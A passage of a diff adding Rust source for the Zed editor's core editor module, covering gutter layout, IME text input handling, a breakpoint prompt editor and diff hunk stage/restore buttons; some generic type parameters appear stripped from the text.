self.is_focused + } + + pub fn placeholder_text(&self) -> Option<&Arc> { + self.placeholder_text.as_ref() + } + + pub fn scroll_position(&self) -> gpui::Point { + self.scroll_anchor.scroll_position(&self.display_snapshot) + } + + fn gutter_dimensions( + &self, + font_id: FontId, + font_size: Pixels, + max_line_number_width: Pixels, + cx: &App, + ) -> Option { + if !self.show_gutter { + return None; + } + + let descent = cx.text_system().descent(font_id, font_size); + let em_width = cx.text_system().em_width(font_id, font_size).log_err()?; + let em_advance = cx.text_system().em_advance(font_id, font_size).log_err()?; + + let show_git_gutter = self.show_git_diff_gutter.unwrap_or_else(|| { + matches!( + ProjectSettings::get_global(cx).git.git_gutter, + Some(GitGutterSetting::TrackedFiles) + ) + }); + let gutter_settings = EditorSettings::get_global(cx).gutter; + let show_line_numbers = self + .show_line_numbers + .unwrap_or(gutter_settings.line_numbers); + let line_gutter_width = if show_line_numbers { + // Avoid flicker-like gutter resizes when the line number gains another digit and only resize the gutter on files with N*10^5 lines. + let min_width_for_number_on_gutter = em_advance * MIN_LINE_NUMBER_DIGITS as f32; + max_line_number_width.max(min_width_for_number_on_gutter) + } else { + 0.0.into() + }; + + let show_code_actions = self + .show_code_actions + .unwrap_or(gutter_settings.code_actions); + + let show_runnables = self.show_runnables.unwrap_or(gutter_settings.runnables); + let show_breakpoints = self.show_breakpoints.unwrap_or(gutter_settings.breakpoints); + + let git_blame_entries_width = + self.git_blame_gutter_max_author_length + .map(|max_author_length| { + let renderer = cx.global::().0.clone(); + const MAX_RELATIVE_TIMESTAMP: &str = "60 minutes ago"; + + /// The number of characters to dedicate to gaps and margins. 
+ const SPACING_WIDTH: usize = 4; + + let max_char_count = max_author_length.min(renderer.max_author_length()) + + ::git::SHORT_SHA_LENGTH + + MAX_RELATIVE_TIMESTAMP.len() + + SPACING_WIDTH; + + em_advance * max_char_count + }); + + let is_singleton = self.buffer_snapshot.is_singleton(); + + let mut left_padding = git_blame_entries_width.unwrap_or(Pixels::ZERO); + left_padding += if !is_singleton { + em_width * 4.0 + } else if show_code_actions || show_runnables || show_breakpoints { + em_width * 3.0 + } else if show_git_gutter && show_line_numbers { + em_width * 2.0 + } else if show_git_gutter || show_line_numbers { + em_width + } else { + px(0.) + }; + + let shows_folds = is_singleton && gutter_settings.folds; + + let right_padding = if shows_folds && show_line_numbers { + em_width * 4.0 + } else if shows_folds || (!is_singleton && show_line_numbers) { + em_width * 3.0 + } else if show_line_numbers { + em_width + } else { + px(0.) + }; + + Some(GutterDimensions { + left_padding, + right_padding, + width: line_gutter_width + left_padding + right_padding, + margin: -descent, + git_blame_entries_width, + }) + } + + pub fn render_crease_toggle( + &self, + buffer_row: MultiBufferRow, + row_contains_cursor: bool, + editor: Entity, + window: &mut Window, + cx: &mut App, + ) -> Option { + let folded = self.is_line_folded(buffer_row); + let mut is_foldable = false; + + if let Some(crease) = self + .crease_snapshot + .query_row(buffer_row, &self.buffer_snapshot) + { + is_foldable = true; + match crease { + Crease::Inline { render_toggle, .. } | Crease::Block { render_toggle, .. 
} => { + if let Some(render_toggle) = render_toggle { + let toggle_callback = + Arc::new(move |folded, window: &mut Window, cx: &mut App| { + if folded { + editor.update(cx, |editor, cx| { + editor.fold_at(buffer_row, window, cx) + }); + } else { + editor.update(cx, |editor, cx| { + editor.unfold_at(buffer_row, window, cx) + }); + } + }); + return Some((render_toggle)( + buffer_row, + folded, + toggle_callback, + window, + cx, + )); + } + } + } + } + + is_foldable |= self.starts_indent(buffer_row); + + if folded || (is_foldable && (row_contains_cursor || self.gutter_hovered)) { + Some( + Disclosure::new(("gutter_crease", buffer_row.0), !folded) + .toggle_state(folded) + .on_click(window.listener_for(&editor, move |this, _e, window, cx| { + if folded { + this.unfold_at(buffer_row, window, cx); + } else { + this.fold_at(buffer_row, window, cx); + } + })) + .into_any_element(), + ) + } else { + None + } + } + + pub fn render_crease_trailer( + &self, + buffer_row: MultiBufferRow, + window: &mut Window, + cx: &mut App, + ) -> Option { + let folded = self.is_line_folded(buffer_row); + if let Crease::Inline { render_trailer, .. } = self + .crease_snapshot + .query_row(buffer_row, &self.buffer_snapshot)? 
+ { + let render_trailer = render_trailer.as_ref()?; + Some(render_trailer(buffer_row, folded, window, cx)) + } else { + None + } + } +} + +impl Deref for EditorSnapshot { + type Target = DisplaySnapshot; + + fn deref(&self) -> &Self::Target { + &self.display_snapshot + } +} + +#[derive(Clone, Debug, PartialEq, Eq)] +pub enum EditorEvent { + InputIgnored { + text: Arc, + }, + InputHandled { + utf16_range_to_replace: Option>, + text: Arc, + }, + ExcerptsAdded { + buffer: Entity, + predecessor: ExcerptId, + excerpts: Vec<(ExcerptId, ExcerptRange)>, + }, + ExcerptsRemoved { + ids: Vec, + removed_buffer_ids: Vec, + }, + BufferFoldToggled { + ids: Vec, + folded: bool, + }, + ExcerptsEdited { + ids: Vec, + }, + ExcerptsExpanded { + ids: Vec, + }, + BufferEdited, + Edited { + transaction_id: clock::Lamport, + }, + Reparsed(BufferId), + Focused, + FocusedIn, + Blurred, + DirtyChanged, + Saved, + TitleChanged, + DiffBaseChanged, + SelectionsChanged { + local: bool, + }, + ScrollPositionChanged { + local: bool, + autoscroll: bool, + }, + Closed, + TransactionUndone { + transaction_id: clock::Lamport, + }, + TransactionBegun { + transaction_id: clock::Lamport, + }, + Reloaded, + CursorShapeChanged, + PushedToNavHistory { + anchor: Anchor, + is_deactivate: bool, + }, +} + +impl EventEmitter for Editor {} + +impl Focusable for Editor { + fn focus_handle(&self, _cx: &App) -> FocusHandle { + self.focus_handle.clone() + } +} + +impl Render for Editor { + fn render(&mut self, _: &mut Window, cx: &mut Context) -> impl IntoElement { + let settings = ThemeSettings::get_global(cx); + + let mut text_style = match self.mode { + EditorMode::SingleLine { .. } | EditorMode::AutoHeight { .. 
} => TextStyle { + color: cx.theme().colors().editor_foreground, + font_family: settings.ui_font.family.clone(), + font_features: settings.ui_font.features.clone(), + font_fallbacks: settings.ui_font.fallbacks.clone(), + font_size: rems(0.875).into(), + font_weight: settings.ui_font.weight, + line_height: relative(settings.buffer_line_height.value()), + ..Default::default() + }, + EditorMode::Full { .. } => TextStyle { + color: cx.theme().colors().editor_foreground, + font_family: settings.buffer_font.family.clone(), + font_features: settings.buffer_font.features.clone(), + font_fallbacks: settings.buffer_font.fallbacks.clone(), + font_size: settings.buffer_font_size(cx).into(), + font_weight: settings.buffer_font.weight, + line_height: relative(settings.buffer_line_height.value()), + ..Default::default() + }, + }; + if let Some(text_style_refinement) = &self.text_style_refinement { + text_style.refine(text_style_refinement) + } + + let background = match self.mode { + EditorMode::SingleLine { .. } => cx.theme().system().transparent, + EditorMode::AutoHeight { max_lines: _ } => cx.theme().system().transparent, + EditorMode::Full { .. 
} => cx.theme().colors().editor_background, + }; + + EditorElement::new( + &cx.entity(), + EditorStyle { + background, + local_player: cx.theme().players().local(), + text: text_style, + scrollbar_width: EditorElement::SCROLLBAR_WIDTH, + syntax: cx.theme().syntax().clone(), + status: cx.theme().status().clone(), + inlay_hints_style: make_inlay_hints_style(cx), + inline_completion_styles: make_suggestion_styles(cx), + unnecessary_code_fade: ThemeSettings::get_global(cx).unnecessary_code_fade, + }, + ) + } +} + +impl EntityInputHandler for Editor { + fn text_for_range( + &mut self, + range_utf16: Range, + adjusted_range: &mut Option>, + _: &mut Window, + cx: &mut Context, + ) -> Option { + let snapshot = self.buffer.read(cx).read(cx); + let start = snapshot.clip_offset_utf16(OffsetUtf16(range_utf16.start), Bias::Left); + let end = snapshot.clip_offset_utf16(OffsetUtf16(range_utf16.end), Bias::Right); + if (start.0..end.0) != range_utf16 { + adjusted_range.replace(start.0..end.0); + } + Some(snapshot.text_for_range(start..end).collect()) + } + + fn selected_text_range( + &mut self, + ignore_disabled_input: bool, + _: &mut Window, + cx: &mut Context, + ) -> Option { + // Prevent the IME menu from appearing when holding down an alphabetic key + // while input is disabled. 
+ if !ignore_disabled_input && !self.input_enabled { + return None; + } + + let selection = self.selections.newest::(cx); + let range = selection.range(); + + Some(UTF16Selection { + range: range.start.0..range.end.0, + reversed: selection.reversed, + }) + } + + fn marked_text_range(&self, _: &mut Window, cx: &mut Context) -> Option> { + let snapshot = self.buffer.read(cx).read(cx); + let range = self.text_highlights::(cx)?.1.first()?; + Some(range.start.to_offset_utf16(&snapshot).0..range.end.to_offset_utf16(&snapshot).0) + } + + fn unmark_text(&mut self, _: &mut Window, cx: &mut Context) { + self.clear_highlights::(cx); + self.ime_transaction.take(); + } + + fn replace_text_in_range( + &mut self, + range_utf16: Option>, + text: &str, + window: &mut Window, + cx: &mut Context, + ) { + if !self.input_enabled { + cx.emit(EditorEvent::InputIgnored { text: text.into() }); + return; + } + + self.transact(window, cx, |this, window, cx| { + let new_selected_ranges = if let Some(range_utf16) = range_utf16 { + let range_utf16 = OffsetUtf16(range_utf16.start)..OffsetUtf16(range_utf16.end); + Some(this.selection_replacement_ranges(range_utf16, cx)) + } else { + this.marked_text_ranges(cx) + }; + + let range_to_replace = new_selected_ranges.as_ref().and_then(|ranges_to_replace| { + let newest_selection_id = this.selections.newest_anchor().id; + this.selections + .all::(cx) + .iter() + .zip(ranges_to_replace.iter()) + .find_map(|(selection, range)| { + if selection.id == newest_selection_id { + Some( + (range.start.0 as isize - selection.head().0 as isize) + ..(range.end.0 as isize - selection.head().0 as isize), + ) + } else { + None + } + }) + }); + + cx.emit(EditorEvent::InputHandled { + utf16_range_to_replace: range_to_replace, + text: text.into(), + }); + + if let Some(new_selected_ranges) = new_selected_ranges { + this.change_selections(None, window, cx, |selections| { + selections.select_ranges(new_selected_ranges) + }); + this.backspace(&Default::default(), window, 
cx); + } + + this.handle_input(text, window, cx); + }); + + if let Some(transaction) = self.ime_transaction { + self.buffer.update(cx, |buffer, cx| { + buffer.group_until_transaction(transaction, cx); + }); + } + + self.unmark_text(window, cx); + } + + fn replace_and_mark_text_in_range( + &mut self, + range_utf16: Option>, + text: &str, + new_selected_range_utf16: Option>, + window: &mut Window, + cx: &mut Context, + ) { + if !self.input_enabled { + return; + } + + let transaction = self.transact(window, cx, |this, window, cx| { + let ranges_to_replace = if let Some(mut marked_ranges) = this.marked_text_ranges(cx) { + let snapshot = this.buffer.read(cx).read(cx); + if let Some(relative_range_utf16) = range_utf16.as_ref() { + for marked_range in &mut marked_ranges { + marked_range.end.0 = marked_range.start.0 + relative_range_utf16.end; + marked_range.start.0 += relative_range_utf16.start; + marked_range.start = + snapshot.clip_offset_utf16(marked_range.start, Bias::Left); + marked_range.end = + snapshot.clip_offset_utf16(marked_range.end, Bias::Right); + } + } + Some(marked_ranges) + } else if let Some(range_utf16) = range_utf16 { + let range_utf16 = OffsetUtf16(range_utf16.start)..OffsetUtf16(range_utf16.end); + Some(this.selection_replacement_ranges(range_utf16, cx)) + } else { + None + }; + + let range_to_replace = ranges_to_replace.as_ref().and_then(|ranges_to_replace| { + let newest_selection_id = this.selections.newest_anchor().id; + this.selections + .all::(cx) + .iter() + .zip(ranges_to_replace.iter()) + .find_map(|(selection, range)| { + if selection.id == newest_selection_id { + Some( + (range.start.0 as isize - selection.head().0 as isize) + ..(range.end.0 as isize - selection.head().0 as isize), + ) + } else { + None + } + }) + }); + + cx.emit(EditorEvent::InputHandled { + utf16_range_to_replace: range_to_replace, + text: text.into(), + }); + + if let Some(ranges) = ranges_to_replace { + this.change_selections(None, window, cx, |s| 
s.select_ranges(ranges)); + } + + let marked_ranges = { + let snapshot = this.buffer.read(cx).read(cx); + this.selections + .disjoint_anchors() + .iter() + .map(|selection| { + selection.start.bias_left(&snapshot)..selection.end.bias_right(&snapshot) + }) + .collect::>() + }; + + if text.is_empty() { + this.unmark_text(window, cx); + } else { + this.highlight_text::( + marked_ranges.clone(), + HighlightStyle { + underline: Some(UnderlineStyle { + thickness: px(1.), + color: None, + wavy: false, + }), + ..Default::default() + }, + cx, + ); + } + + // Disable auto-closing when composing text (i.e. typing a `"` on a Brazilian keyboard) + let use_autoclose = this.use_autoclose; + let use_auto_surround = this.use_auto_surround; + this.set_use_autoclose(false); + this.set_use_auto_surround(false); + this.handle_input(text, window, cx); + this.set_use_autoclose(use_autoclose); + this.set_use_auto_surround(use_auto_surround); + + if let Some(new_selected_range) = new_selected_range_utf16 { + let snapshot = this.buffer.read(cx).read(cx); + let new_selected_ranges = marked_ranges + .into_iter() + .map(|marked_range| { + let insertion_start = marked_range.start.to_offset_utf16(&snapshot).0; + let new_start = OffsetUtf16(new_selected_range.start + insertion_start); + let new_end = OffsetUtf16(new_selected_range.end + insertion_start); + snapshot.clip_offset_utf16(new_start, Bias::Left) + ..snapshot.clip_offset_utf16(new_end, Bias::Right) + }) + .collect::>(); + + drop(snapshot); + this.change_selections(None, window, cx, |selections| { + selections.select_ranges(new_selected_ranges) + }); + } + }); + + self.ime_transaction = self.ime_transaction.or(transaction); + if let Some(transaction) = self.ime_transaction { + self.buffer.update(cx, |buffer, cx| { + buffer.group_until_transaction(transaction, cx); + }); + } + + if self.text_highlights::(cx).is_none() { + self.ime_transaction.take(); + } + } + + fn bounds_for_range( + &mut self, + range_utf16: Range, + element_bounds: 
gpui::Bounds, + window: &mut Window, + cx: &mut Context, + ) -> Option> { + let text_layout_details = self.text_layout_details(window); + let gpui::Size { + width: em_width, + height: line_height, + } = self.character_size(window); + + let snapshot = self.snapshot(window, cx); + let scroll_position = snapshot.scroll_position(); + let scroll_left = scroll_position.x * em_width; + + let start = OffsetUtf16(range_utf16.start).to_display_point(&snapshot); + let x = snapshot.x_for_display_point(start, &text_layout_details) - scroll_left + + self.gutter_dimensions.width + + self.gutter_dimensions.margin; + let y = line_height * (start.row().as_f32() - scroll_position.y); + + Some(Bounds { + origin: element_bounds.origin + point(x, y), + size: size(em_width, line_height), + }) + } + + fn character_index_for_point( + &mut self, + point: gpui::Point, + _window: &mut Window, + _cx: &mut Context, + ) -> Option { + let position_map = self.last_position_map.as_ref()?; + if !position_map.text_hitbox.contains(&point) { + return None; + } + let display_point = position_map.point_for_position(point).previous_valid; + let anchor = position_map + .snapshot + .display_point_to_anchor(display_point, Bias::Left); + let utf16_offset = anchor.to_offset_utf16(&position_map.snapshot.buffer_snapshot); + Some(utf16_offset.0) + } +} + +trait SelectionExt { + fn display_range(&self, map: &DisplaySnapshot) -> Range; + fn spanned_rows( + &self, + include_end_if_at_line_start: bool, + map: &DisplaySnapshot, + ) -> Range; +} + +impl SelectionExt for Selection { + fn display_range(&self, map: &DisplaySnapshot) -> Range { + let start = self + .start + .to_point(&map.buffer_snapshot) + .to_display_point(map); + let end = self + .end + .to_point(&map.buffer_snapshot) + .to_display_point(map); + if self.reversed { + end..start + } else { + start..end + } + } + + fn spanned_rows( + &self, + include_end_if_at_line_start: bool, + map: &DisplaySnapshot, + ) -> Range { + let start = 
self.start.to_point(&map.buffer_snapshot); + let mut end = self.end.to_point(&map.buffer_snapshot); + if !include_end_if_at_line_start && start.row != end.row && end.column == 0 { + end.row -= 1; + } + + let buffer_start = map.prev_line_boundary(start).0; + let buffer_end = map.next_line_boundary(end).0; + MultiBufferRow(buffer_start.row)..MultiBufferRow(buffer_end.row + 1) + } +} + +impl InvalidationStack { + fn invalidate(&mut self, selections: &[Selection], buffer: &MultiBufferSnapshot) + where + S: Clone + ToOffset, + { + while let Some(region) = self.last() { + let all_selections_inside_invalidation_ranges = + if selections.len() == region.ranges().len() { + selections + .iter() + .zip(region.ranges().iter().map(|r| r.to_offset(buffer))) + .all(|(selection, invalidation_range)| { + let head = selection.head().to_offset(buffer); + invalidation_range.start <= head && invalidation_range.end >= head + }) + } else { + false + }; + + if all_selections_inside_invalidation_ranges { + break; + } else { + self.pop(); + } + } + } +} + +impl Default for InvalidationStack { + fn default() -> Self { + Self(Default::default()) + } +} + +impl Deref for InvalidationStack { + type Target = Vec; + + fn deref(&self) -> &Self::Target { + &self.0 + } +} + +impl DerefMut for InvalidationStack { + fn deref_mut(&mut self) -> &mut Self::Target { + &mut self.0 + } +} + +impl InvalidationRegion for SnippetState { + fn ranges(&self) -> &[Range] { + &self.ranges[self.active_index] + } +} + +fn inline_completion_edit_text( + current_snapshot: &BufferSnapshot, + edits: &[(Range, String)], + edit_preview: &EditPreview, + include_deletions: bool, + cx: &App, +) -> HighlightedText { + let edits = edits + .iter() + .map(|(anchor, text)| { + ( + anchor.start.text_anchor..anchor.end.text_anchor, + text.clone(), + ) + }) + .collect::>(); + + edit_preview.highlight_edits(current_snapshot, &edits, include_deletions, cx) +} + +pub fn diagnostic_style(severity: DiagnosticSeverity, colors: 
&StatusColors) -> Hsla { + match severity { + DiagnosticSeverity::ERROR => colors.error, + DiagnosticSeverity::WARNING => colors.warning, + DiagnosticSeverity::INFORMATION => colors.info, + DiagnosticSeverity::HINT => colors.info, + _ => colors.ignored, + } +} + +pub fn styled_runs_for_code_label<'a>( + label: &'a CodeLabel, + syntax_theme: &'a theme::SyntaxTheme, +) -> impl 'a + Iterator, HighlightStyle)> { + let fade_out = HighlightStyle { + fade_out: Some(0.35), + ..Default::default() + }; + + let mut prev_end = label.filter_range.end; + label + .runs + .iter() + .enumerate() + .flat_map(move |(ix, (range, highlight_id))| { + let style = if let Some(style) = highlight_id.style(syntax_theme) { + style + } else { + return Default::default(); + }; + let mut muted_style = style; + muted_style.highlight(fade_out); + + let mut runs = SmallVec::<[(Range, HighlightStyle); 3]>::new(); + if range.start >= label.filter_range.end { + if range.start > prev_end { + runs.push((prev_end..range.start, fade_out)); + } + runs.push((range.clone(), muted_style)); + } else if range.end <= label.filter_range.end { + runs.push((range.clone(), style)); + } else { + runs.push((range.start..label.filter_range.end, style)); + runs.push((label.filter_range.end..range.end, muted_style)); + } + prev_end = cmp::max(prev_end, range.end); + + if ix + 1 == label.runs.len() && label.text.len() > prev_end { + runs.push((prev_end..label.text.len(), fade_out)); + } + + runs + }) +} + +pub(crate) fn split_words(text: &str) -> impl std::iter::Iterator + '_ { + let mut prev_index = 0; + let mut prev_codepoint: Option = None; + text.char_indices() + .chain([(text.len(), '\0')]) + .filter_map(move |(index, codepoint)| { + let prev_codepoint = prev_codepoint.replace(codepoint)?; + let is_boundary = index == text.len() + || !prev_codepoint.is_uppercase() && codepoint.is_uppercase() + || !prev_codepoint.is_alphanumeric() && codepoint.is_alphanumeric(); + if is_boundary { + let chunk = 
&text[prev_index..index]; + prev_index = index; + Some(chunk) + } else { + None + } + }) +} + +pub trait RangeToAnchorExt: Sized { + fn to_anchors(self, snapshot: &MultiBufferSnapshot) -> Range; + + fn to_display_points(self, snapshot: &EditorSnapshot) -> Range { + let anchor_range = self.to_anchors(&snapshot.buffer_snapshot); + anchor_range.start.to_display_point(snapshot)..anchor_range.end.to_display_point(snapshot) + } +} + +impl RangeToAnchorExt for Range { + fn to_anchors(self, snapshot: &MultiBufferSnapshot) -> Range { + let start_offset = self.start.to_offset(snapshot); + let end_offset = self.end.to_offset(snapshot); + if start_offset == end_offset { + snapshot.anchor_before(start_offset)..snapshot.anchor_before(end_offset) + } else { + snapshot.anchor_after(self.start)..snapshot.anchor_before(self.end) + } + } +} + +pub trait RowExt { + fn as_f32(&self) -> f32; + + fn next_row(&self) -> Self; + + fn previous_row(&self) -> Self; + + fn minus(&self, other: Self) -> u32; +} + +impl RowExt for DisplayRow { + fn as_f32(&self) -> f32 { + self.0 as f32 + } + + fn next_row(&self) -> Self { + Self(self.0 + 1) + } + + fn previous_row(&self) -> Self { + Self(self.0.saturating_sub(1)) + } + + fn minus(&self, other: Self) -> u32 { + self.0 - other.0 + } +} + +impl RowExt for MultiBufferRow { + fn as_f32(&self) -> f32 { + self.0 as f32 + } + + fn next_row(&self) -> Self { + Self(self.0 + 1) + } + + fn previous_row(&self) -> Self { + Self(self.0.saturating_sub(1)) + } + + fn minus(&self, other: Self) -> u32 { + self.0 - other.0 + } +} + +trait RowRangeExt { + type Row; + + fn len(&self) -> usize; + + fn iter_rows(&self) -> impl DoubleEndedIterator; +} + +impl RowRangeExt for Range { + type Row = MultiBufferRow; + + fn len(&self) -> usize { + (self.end.0 - self.start.0) as usize + } + + fn iter_rows(&self) -> impl DoubleEndedIterator { + (self.start.0..self.end.0).map(MultiBufferRow) + } +} + +impl RowRangeExt for Range { + type Row = DisplayRow; + + fn len(&self) -> 
usize { + (self.end.0 - self.start.0) as usize + } + + fn iter_rows(&self) -> impl DoubleEndedIterator { + (self.start.0..self.end.0).map(DisplayRow) + } +} + +/// If select range has more than one line, we +/// just point the cursor to range.start. +fn collapse_multiline_range(range: Range) -> Range { + if range.start.row == range.end.row { + range + } else { + range.start..range.start + } +} +pub struct KillRing(ClipboardItem); +impl Global for KillRing {} + +const UPDATE_DEBOUNCE: Duration = Duration::from_millis(50); + +enum BreakpointPromptEditAction { + Log, + Condition, + HitCondition, +} + +struct BreakpointPromptEditor { + pub(crate) prompt: Entity, + editor: WeakEntity, + breakpoint_anchor: Anchor, + breakpoint: Breakpoint, + edit_action: BreakpointPromptEditAction, + block_ids: HashSet, + gutter_dimensions: Arc>, + _subscriptions: Vec, +} + +impl BreakpointPromptEditor { + const MAX_LINES: u8 = 4; + + fn new( + editor: WeakEntity, + breakpoint_anchor: Anchor, + breakpoint: Breakpoint, + edit_action: BreakpointPromptEditAction, + window: &mut Window, + cx: &mut Context, + ) -> Self { + let base_text = match edit_action { + BreakpointPromptEditAction::Log => breakpoint.message.as_ref(), + BreakpointPromptEditAction::Condition => breakpoint.condition.as_ref(), + BreakpointPromptEditAction::HitCondition => breakpoint.hit_condition.as_ref(), + } + .map(|msg| msg.to_string()) + .unwrap_or_default(); + + let buffer = cx.new(|cx| Buffer::local(base_text, cx)); + let buffer = cx.new(|cx| MultiBuffer::singleton(buffer, cx)); + + let prompt = cx.new(|cx| { + let mut prompt = Editor::new( + EditorMode::AutoHeight { + max_lines: Self::MAX_LINES as usize, + }, + buffer, + None, + window, + cx, + ); + prompt.set_soft_wrap_mode(language::language_settings::SoftWrap::EditorWidth, cx); + prompt.set_show_cursor_when_unfocused(false, cx); + prompt.set_placeholder_text( + match edit_action { + BreakpointPromptEditAction::Log => "Message to log when a breakpoint is hit. 
Expressions within {} are interpolated.", + BreakpointPromptEditAction::Condition => "Condition when a breakpoint is hit. Expressions within {} are interpolated.", + BreakpointPromptEditAction::HitCondition => "How many breakpoint hits to ignore", + }, + cx, + ); + + prompt + }); + + Self { + prompt, + editor, + breakpoint_anchor, + breakpoint, + edit_action, + gutter_dimensions: Arc::new(Mutex::new(GutterDimensions::default())), + block_ids: Default::default(), + _subscriptions: vec![], + } + } + + pub(crate) fn add_block_ids(&mut self, block_ids: Vec) { + self.block_ids.extend(block_ids) + } + + fn confirm(&mut self, _: &menu::Confirm, window: &mut Window, cx: &mut Context) { + if let Some(editor) = self.editor.upgrade() { + let message = self + .prompt + .read(cx) + .buffer + .read(cx) + .as_singleton() + .expect("A multi buffer in breakpoint prompt isn't possible") + .read(cx) + .as_rope() + .to_string(); + + editor.update(cx, |editor, cx| { + editor.edit_breakpoint_at_anchor( + self.breakpoint_anchor, + self.breakpoint.clone(), + match self.edit_action { + BreakpointPromptEditAction::Log => { + BreakpointEditAction::EditLogMessage(message.into()) + } + BreakpointPromptEditAction::Condition => { + BreakpointEditAction::EditCondition(message.into()) + } + BreakpointPromptEditAction::HitCondition => { + BreakpointEditAction::EditHitCondition(message.into()) + } + }, + cx, + ); + + editor.remove_blocks(self.block_ids.clone(), None, cx); + cx.focus_self(window); + }); + } + } + + fn cancel(&mut self, _: &menu::Cancel, window: &mut Window, cx: &mut Context) { + self.editor + .update(cx, |editor, cx| { + editor.remove_blocks(self.block_ids.clone(), None, cx); + window.focus(&editor.focus_handle); + }) + .log_err(); + } + + fn render_prompt_editor(&self, cx: &mut Context) -> impl IntoElement { + let settings = ThemeSettings::get_global(cx); + let text_style = TextStyle { + color: if self.prompt.read(cx).read_only(cx) { + cx.theme().colors().text_disabled + } else { + 
cx.theme().colors().text + }, + font_family: settings.buffer_font.family.clone(), + font_fallbacks: settings.buffer_font.fallbacks.clone(), + font_size: settings.buffer_font_size(cx).into(), + font_weight: settings.buffer_font.weight, + line_height: relative(settings.buffer_line_height.value()), + ..Default::default() + }; + EditorElement::new( + &self.prompt, + EditorStyle { + background: cx.theme().colors().editor_background, + local_player: cx.theme().players().local(), + text: text_style, + ..Default::default() + }, + ) + } +} + +impl Render for BreakpointPromptEditor { + fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { + let gutter_dimensions = *self.gutter_dimensions.lock(); + h_flex() + .key_context("Editor") + .bg(cx.theme().colors().editor_background) + .border_y_1() + .border_color(cx.theme().status().info_border) + .size_full() + .py(window.line_height() / 2.5) + .on_action(cx.listener(Self::confirm)) + .on_action(cx.listener(Self::cancel)) + .child(h_flex().w(gutter_dimensions.full_width() + (gutter_dimensions.margin / 2.0))) + .child(div().flex_1().child(self.render_prompt_editor(cx))) + } +} + +impl Focusable for BreakpointPromptEditor { + fn focus_handle(&self, cx: &App) -> FocusHandle { + self.prompt.focus_handle(cx) + } +} + +fn all_edits_insertions_or_deletions( + edits: &Vec<(Range, String)>, + snapshot: &MultiBufferSnapshot, +) -> bool { + let mut all_insertions = true; + let mut all_deletions = true; + + for (range, new_text) in edits.iter() { + let range_is_empty = range.to_offset(&snapshot).is_empty(); + let text_is_empty = new_text.is_empty(); + + if range_is_empty != text_is_empty { + if range_is_empty { + all_deletions = false; + } else { + all_insertions = false; + } + } else { + return false; + } + + if !all_insertions && !all_deletions { + return false; + } + } + all_insertions || all_deletions +} + +struct MissingEditPredictionKeybindingTooltip; + +impl Render for MissingEditPredictionKeybindingTooltip 
{ + fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { + ui::tooltip_container(window, cx, |container, _, cx| { + container + .flex_shrink_0() + .max_w_80() + .min_h(rems_from_px(124.)) + .justify_between() + .child( + v_flex() + .flex_1() + .text_ui_sm(cx) + .child(Label::new("Conflict with Accept Keybinding")) + .child("Your keymap currently overrides the default accept keybinding. To continue, assign one keybinding for the `editor::AcceptEditPrediction` action.") + ) + .child( + h_flex() + .pb_1() + .gap_1() + .items_end() + .w_full() + .child(Button::new("open-keymap", "Assign Keybinding").size(ButtonSize::Compact).on_click(|_ev, window, cx| { + window.dispatch_action(zed_actions::OpenKeymap.boxed_clone(), cx) + })) + .child(Button::new("see-docs", "See Docs").size(ButtonSize::Compact).on_click(|_ev, _window, cx| { + cx.open_url("https://zed.dev/docs/completions#edit-predictions-missing-keybinding"); + })), + ) + }) + } +} + +#[derive(Debug, Clone, Copy, PartialEq)] +pub struct LineHighlight { + pub background: Background, + pub border: Option, + pub include_gutter: bool, + pub type_id: Option, +} + +fn render_diff_hunk_controls( + row: u32, + status: &DiffHunkStatus, + hunk_range: Range, + is_created_file: bool, + line_height: Pixels, + editor: &Entity, + _window: &mut Window, + cx: &mut App, +) -> AnyElement { + h_flex() + .h(line_height) + .mr_1() + .gap_1() + .px_0p5() + .pb_1() + .border_x_1() + .border_b_1() + .border_color(cx.theme().colors().border_variant) + .rounded_b_lg() + .bg(cx.theme().colors().editor_background) + .gap_1() + .occlude() + .shadow_md() + .child(if status.has_secondary_hunk() { + Button::new(("stage", row as u64), "Stage") + .alpha(if status.is_pending() { 0.66 } else { 1.0 }) + .tooltip({ + let focus_handle = editor.focus_handle(cx); + move |window, cx| { + Tooltip::for_action_in( + "Stage Hunk", + &::git::ToggleStaged, + &focus_handle, + window, + cx, + ) + } + }) + .on_click({ + let editor = 
editor.clone(); + move |_event, _window, cx| { + editor.update(cx, |editor, cx| { + editor.stage_or_unstage_diff_hunks( + true, + vec![hunk_range.start..hunk_range.start], + cx, + ); + }); + } + }) + } else { + Button::new(("unstage", row as u64), "Unstage") + .alpha(if status.is_pending() { 0.66 } else { 1.0 }) + .tooltip({ + let focus_handle = editor.focus_handle(cx); + move |window, cx| { + Tooltip::for_action_in( + "Unstage Hunk", + &::git::ToggleStaged, + &focus_handle, + window, + cx, + ) + } + }) + .on_click({ + let editor = editor.clone(); + move |_event, _window, cx| { + editor.update(cx, |editor, cx| { + editor.stage_or_unstage_diff_hunks( + false, + vec![hunk_range.start..hunk_range.start], + cx, + ); + }); + } + }) + }) + .child( + Button::new(("restore", row as u64), "Restore") + .tooltip({ + let focus_handle = editor.focus_handle(cx); + move |window, cx| { + Tooltip::for_action_in( + "Restore Hunk", + &::git::Restore, + &focus_handle, + window, + cx, + ) + } + }) + .on_click({ + let editor = editor.clone(); + move |_event, window, cx| { + editor.update(cx, |editor, cx| { + let snapshot = editor.snapshot(window, cx); + let point = hunk_range.start.to_point(&snapshot.buffer_snapshot); + editor.restore_hunks_in_ranges(vec![point..point], window, cx); + }); + } + }) + .disabled(is_created_file), + ) + .when( + !editor.read(cx).buffer().read(cx).all_diff_hunks_expanded(), + |el| { + el.child( + IconButton::new(("next-hunk", row as u64), IconName::ArrowDown) + .shape(IconButtonShape::Square) + .icon_size(IconSize::Small) + // .disabled(!has_multiple_hunks) + .tooltip({ + let focus_handle = editor.focus_handle(cx); + move |window, cx| { + Tooltip::for_action_in( + "Next Hunk", + &GoToHunk, + &focus_handle, + window, + cx, + ) + } + }) + .on_click({ + let editor = editor.clone(); + move |_event, window, cx| { + editor.update(cx, |editor, cx| { + let snapshot = editor.snapshot(window, cx); + let position = + hunk_range.end.to_point(&snapshot.buffer_snapshot); 
